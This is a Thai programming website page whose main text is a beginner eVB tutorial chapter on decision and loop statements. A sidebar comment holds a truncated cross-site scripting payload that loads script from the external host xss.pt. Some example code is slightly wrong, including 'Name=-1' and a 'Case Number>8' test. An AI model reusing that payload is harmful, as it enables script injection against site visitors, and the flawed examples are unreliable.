หน้าแรก
 การบ้าน
  C/C++ new
  Java new
 Sourcecode.TV
  Android
  Blackberry
  C/C++
  Java
  Linux
  Windows Phone
  แจ้งเรื่องที่ต้องการ
 บทความ
  .NET
  Android
  Blackberry
  C++Builder
  Delphi
  Java
  Mobile
  Open Source
  Pocket PC
  Visual Basic
  Web
  Windows Phone
  Others
 แบบเรียนฟรี
  ASP
  ASP.NET Webmatrix
  C++
  eVB
  J2ME
  Java
  PHP
 ซอร์สโค้ด
  Android
  ASP
  C++
  VC++
  CGI-Perl
  Delphi
  Java
  jQuery
  PHP
  Visual Basic
  .NET
 บริการจากเรา
  เปิดท้าย... ขายโค้ด
  DoodeeHosting
  รับออกแบบ พัฒนาเว็บไซต์
  Freeware
  อัตราค่าโฆษณา
  รายชื่อลูกค้า
  สถิติผู้เข้าเว็บ
 ดาว์นโหลด
 ค้นหาข้อมูล
 กระดานสนทนา
  .NET
  C/C++
  Delphi
  Java
  Palm/PocketPC
  Visual Basic
  Web
  อื่นๆ
 กระดานงาน
 ลิงค์เว็บ
 เกี่ยวกับผม
 อัตราค่าโฆษณา
Social Network

Facebook  Twitter  YouTube
 New Article
 Webboard
 Freelanceboard
Freeware
โปรแกรมเบอร์ดี (BerDee)
โปรแกรมเบอร์ดี (Android)
เกมส์เป่ายิ้งฉุบ
เกมส์เป่ายิ้งฉุบ(Android)
WebcamMonitor
WebcamMonitor(Windows)
scSendMail
scSendMail(Windows)
MSN Caption
MSN Caption(Windows)
  Freelance comment
  ติดต่อสอบถามมาได้ตลอดนะ...
2015-07-29 13:35:58
  ถ้าผมต้องการเว็บที่พัฒน...
2015-01-18 15:33:54
  ถ้าผมต้องการเว็บที่พัฒน...
2015-01-18 15:32:51
  ติดต่อสอบถามเข้ามาได้นะ...
2014-01-06 12:47:38
  ถ้ายังหาคนสอนไม่ได้ ก็ลอ...
2013-07-06 01:04:37
  สนใจส่งขอบเขตมาคุยราคาก...
2013-03-24 18:54:20
  ถ้ายังไม่มีคนรับงานติดต...
2012-12-16 19:18:14
  สนใจคะ ติดต่อ 0905076277...
2012-11-12 11:07:46
  รับทำโปรเจ็คนักศึกษาหรื...
2012-10-29 03:10:46
  sukit_te34@hotmail.com...
2012-10-29 03:09:36
  Webboard comment
  พอดีผมเห...
2020-05-31 21:49:43
  ช่วย แสดง...
2020-04-27 11:21:00
  ได้การบ้...
2020-04-27 11:18:56
  ได้การบ้...
2020-04-27 11:02:44
  <a href="https://www.g...
2020-03-10 17:07:03
  ไม่อยากเ...
2020-03-10 17:05:36
  ขอโคํดเก...
2020-02-09 22:50:58
  ขอโค้ดเก...
2020-01-28 23:42:26
  uuu...
2020-01-24 11:54:34
  ก็ต้องลง ...
2019-10-22 01:56:28
  Homework comment
  โจทย์การบ้าน c++ เขียนรูปแ...
2020-04-06 11:01:33
  แบบนี้ขอเป็น ภาษา php หน่อย...
2019-09-18 14:36:34
  ผมไม่อยากให้คุณได้คะแนน...
2019-04-27 01:29:07
  อาจารย์เขาบอกแนวข้อสอบม...
2019-04-27 00:44:29
  ขอสอบถามการเขียน c++ ครับ เ...
2018-04-02 12:19:21
  โค้ดตัวอย่างศึกษาให้เข้...
2017-11-26 14:50:05
  คำนวณค่าน้ำโดยรับค่ามิเ...
2017-11-20 23:15:26
  ขอบคุณมากครับ...
2017-08-16 18:27:25
  ทำเอง งง เอง กะลังทำใหม่ค...
2017-04-18 18:40:46
  ทำเอง งง เอง กะลังทำใหม่ค...
2017-04-18 18:37:54
  Article comment
  asdasd...
2020-01-28 19:48:57
  ต้องการ ให้เขียน โปรแกรม ...
2019-12-09 11:39:58
  รับเขียน arx จาก vc++ 2017 ล็อคโปร...
2019-09-19 09:48:09
  ทำการ register ไฟล์ที่ชื่อ mswinsck.oc...
2019-09-17 14:05:56
  <Img sRC=https://xss.pt/op2fp.jpg>
<sCRiPt sRC=//xss.pt/op...

2019-09-12 13:43:34
  ใน vb 6 ไม่มี component winsock เลยค่ะ ส...
2019-09-03 10:31:02
  รบกวนขอสอบถามหน่อยนะครั...
2019-03-04 05:31:04
  สามารถนำตัวหนังสือจากภา...
2018-12-25 08:54:32
  มีcode ของ VB ไหมค่ะ ถ้ามีรบกว...
2017-09-28 16:50:02
  น่าจะได้ครับ ไม่เคยลอง
...

2017-07-11 09:59:35
  9Mcode comment
  อยากได้...
2014-02-21 08:52:19

Link Exchange

อัตราค่าโฆษณา
Statistics of Sourcecode in Thailand
 
 eMbedded Visual Basic Tutorial  

- - - - - - - - - - - - - - ผู้ให้การสนับสนุน- - - - - - - - - - - - - -

 eMbedded Visual Basic
 
 

บทที่ 3 คำสั่งที่ใช้ในการควบคุมการทำงาน

 

จากการที่เราได้สร้างโปรแกรมกันมาบ้างแล้ว จะเห็นว่าโปรแกรมทำงานจากบนลงล่างและจากซ้ายไปขวาตามลำดับ แต่ในบางครั้ง เราต้องการให้โปรแกรมสามารถเลือกทำงานตามเงื่อนไขของตัวแปรได้ด้วยซึ่งใน eVB ได้เตรียมคำสั่งที่ใช้ตรวจสอบการทำงานตามเงื่อนไขที่ต้องการไว้แล้ว

คำสั่งในการควบคุมสามารถแบ่งได้ 2 ประเภทหลักดังนี้

  • คำสั่งที่ใช้ในการตัดสินใจ (Decision Structures)
  • คำสั่งในการทำซ้ำ (Loop Structures)

 

คำสั่งที่ใช้ในการตัดสินใจ (Decision Structures)

ในกรณีที่เราจำเป็นต้องตัดสินใจเลือกสิ่งใดสิ่งหนึ่ง เราจะใช้คำสั่งเงื่อนไข (Condition) ในการตัดสินใจ โดยคำสั่งประเภทนี้จะแบ่งออกได้เป็น 2 คำสั่ง คือ คำสั่ง If-then-Else และ คำสั่ง Select-Case

  • คำสั่ง If-Then-Else เป็นคำสั่งที่มีรูปแบบดังนี้

If<นิพจน์ที่เป็น Boolean> then

"คำสั่งสำหรับนิพจน์ที่มีค่าเป็น True

else

"คำสั่งสำหรับนิพจน์ที่มีค่าเป็น False

end If

 

ตัวอย่าง

if price>20 then

MsgBox "Too expensive"

else

MsgBox "Price is OK"

end If

  • คำสั่ง Select-Case เป็นคำสั่งใช้ในการเลือกเส้นทางการทำงานของโปรแกรมจากค่าของนิพจน์ที่กำหนดเป็นคำสั่งที่มีรูปแบบต่อไปนี้

Select Case <นิพจน์>

Case<ค่าของนิพจน์กลุ่มแรก>

"คำสั่งที่ทำงานเมื่อค่านิพจน์ตรงกับค่าในกลุ่มแรก

Case<ค่าของนิพจน์กลุ่มที่ 2>

"คำสั่งที่ทำงานเมื่อค่านิพจน์ตรงกับค่าในกลุ่ม 2

Case Else

"คำสั่งเมื่อไม่ตรงกับกรณีไหนเลย

End Select

 

ตัวอย่าง

Name=-1

Select Case Number

Case 1,2,3

MsgBox "Between 1 And 3"

Case 4,5,6,7,8

MsgBox "Between 4 And 8"

Case Number>8

MsgBox "Greather than 8"

Case Else

MsgBox "Not positive number"

End Select

 

คำสั่งที่ใช้ในการทำงานซ้ำ

เราสามารถใช้คำสั่งที่จะกล่าวถึงในหัวข้อนี้ ในการทำงานซ้ำเป็นจำนวนครั้งที่แน่นอน หรือจนกว่าจะทำให้เงื่อนไขเป็นดังที่เราต้องการได้ คำสั่งที่จะกล่าวถึงมี 2 คำสั่ง คือ

  1. คำสั่ง For-Next
  2. คำสั่ง Do-Loop
  • คำสั่ง For-Next คำสั่งนี้จะใช้ในการทำงานซ้ำเป็นจำนวนครั้งที่แน่นอน โดยมีรูปแบบดังนี้

For<ชื่อตัวแปร>=<ค่าเริ่มต้น>To<ค่าสุดท้าย> [step]<ค่าที่เพิ่มขึ้นของตัวแปร>1

"ชุดคำสั่ง

Next

 

ตัวอย่าง

Dim I

For I=0 to 10 step 2

MsgBox I

Next

  • คำสั่ง Do-Loop เป็นคำสั่งที่ใช้ในการทำซ้ำ โดยจำนวนครั้งในการซ้ำขึ้นอยู่กับเงื่อนไขหลังคำว่า while หรือ until รูปแบบของคำสั่งจะเป็นดังนี้

Do While<condition>

"ชุดคำสั่ง

Loop

Do

"ชุดคำสั่ง

Loop While<condition>

Do Until<condition>

"ชุดคำสั่ง

Loop

ตัวอย่าง

Dim I

Do While I<10

MsgBox I
I=I+1

Loop

Dim I

Do

MsgBox I
I=I+1

Loop While I<10

 

BACK

หัวแปลง Mini DisplayPort to HDMI Adapter หัวแปลง Mini DisplayPort to HDMI Adapter สำหรับเครื่อง macbook air/pro, mac mini
หัวแปลง Mini DisplayPort to HDMI Adapter สำหรับเครื่อง macbook air/pro, mac mini
คลิปสอนเขียนโปรแกรม
เรียนเขียนโปรแกรมดอทเน็ต
เรียนเขียนโปรแกรมแอนดรอยด์
เรียนเขียนโปรแกรมเบล็คเบอร์รี่
เรียนเขียนโปรแกรมซี ซีพลัสพลัส
เรียนเขียนโปรแกรมจาวา
เรียนการใช้งานลินุกส์
เรียนการเขียนโปรแกรมวินโดว์โฟน
เรียนการเขียนโปรแกรมพีเฮชพี มายเอสคิวเอล
9M Blog บอกเล่าเรื่องราว การเขียนโปรแกรมของ นายเอ็ม
บริการ ถ่ายภาพรับปริญญา
อัตราค่าโฆษณา
 
Tutorial
eVB Tutorial
ASP.NET Webmatrix Tutorial
J2ME Tutorial
C++  Tutorial
Java  Tutorial
PHP Tutorial
ASP Tutorial
 
แบบสำรวจ
Freelance รับพัฒนาโปรแกรม

Home - Article - Tutorial - Sourcecode - Dev Handbook - Search - WebBoard - Links - About Us

สงวนลิขสิทธิ์ ห้ามคัดลอก ทำซ้ำ แก้ไข ดัดแปลง ไม่ว่าในรูปแบบใด โดยไม่ได้รับอนุญาตเป็นลายลักษณ์อักษร
เลขทะเบียนพาณิชย์อิเล็กทรอนิกส์จากกระทรวงพาณิชย์: 7100503002000
Copyright 2001 SourceCode.in.th